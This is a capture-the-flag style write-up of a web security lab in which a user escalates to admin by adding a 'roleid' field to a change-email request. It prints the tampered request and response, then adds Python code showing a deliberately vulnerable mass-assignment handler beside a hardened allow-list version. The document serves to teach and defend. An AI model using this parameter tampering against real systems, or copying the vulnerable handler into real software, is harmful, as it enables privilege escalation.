User role can be modified in user profile

This lab has an admin panel at /admin. It's only accessible to logged-in users with a roleid of 2.

After logging in as "wiener," I attempted to utilize the email-changing functionality. Notably, the response revealed my current "roleid" as 1, which is insufficient to access the admin panel. To bypass this restriction, I manipulated the POST request by adding a "roleid" parameter with a value of 2:

POST /my-account/change-email HTTP/2
Host: 0ad100740345c7618048495f00e30063.web-security-academy.net
Cookie: session=0fcl54LZuAV4oZpZp5pLws7KPeXx5IfF
Content-Length: 45
...
{"email":"ichyaboy@ich.ich", "roleid":2}

The response to the modified request showed the role updated to 2:

HTTP/2 302 Found
Location: /my-account
...
{
  "username": "wiener",
  "email": "ichyaboy@ich.ich",
  "apikey": "VjsaDdDeQnBY3LQXnUvIClJuVux8ZImK",
  "roleid": 2
}

Now equipped with the necessary role, I could access the admin panel and proceed to delete the "carlos" user, thus solving the lab.
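The root cause is a mass-assignment pattern: the change-email handler copies every field from the JSON body onto the stored user, so a client-supplied "roleid" overwrites the real one. The following is an added illustration, not code from the lab or from PortSwigger; it assumes the vulnerable backend does a wholesale dict update and shows the hardened allow-list version beside it, with a constructed user record and the request body from the write-up.

```python
import json
from copy import deepcopy

# Constructed sample user record, mirroring the fields the lab's
# change-email response exposes (username, email, apikey, roleid).
USERS = {
    "wiener": {
        "username": "wiener",
        "email": "wiener@normal-user.net",
        "apikey": "PLACEHOLDER-APIKEY",
        "roleid": 1,
    }
}
ADMIN_ROLEID = 2  # the lab states /admin requires roleid 2
# Fields a user may change via this endpoint; everything else is server-owned.
CHANGE_EMAIL_FIELDS = {"email"}


def change_email_vulnerable(username, raw_body):
    """Assumed vulnerable pattern: bulk-assign every key in the JSON body
    onto the stored user, so a client-supplied "roleid" replaces the real one."""
    user = deepcopy(USERS[username])
    user.update(json.loads(raw_body))
    return user


def change_email_hardened(username, raw_body):
    """Copy only allow-listed fields. Unexpected fields cause a rejection
    rather than being silently dropped, so the attempt is visible in logs."""
    body = json.loads(raw_body)
    unexpected = set(body) - CHANGE_EMAIL_FIELDS
    if unexpected:
        raise ValueError(f"rejected client-supplied fields: {sorted(unexpected)}")
    if not isinstance(body.get("email"), str) or "@" not in body["email"]:
        raise ValueError("invalid email")
    user = deepcopy(USERS[username])
    user["email"] = body["email"]
    return user


def can_access_admin(user):
    """The access check /admin performs, as described in the lab."""
    return user["roleid"] == ADMIN_ROLEID


# Constructed request body shaped like the tampered one in the write-up.
TAMPERED_BODY = '{"email":"ichyaboy@ich.ich", "roleid":2}'
```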
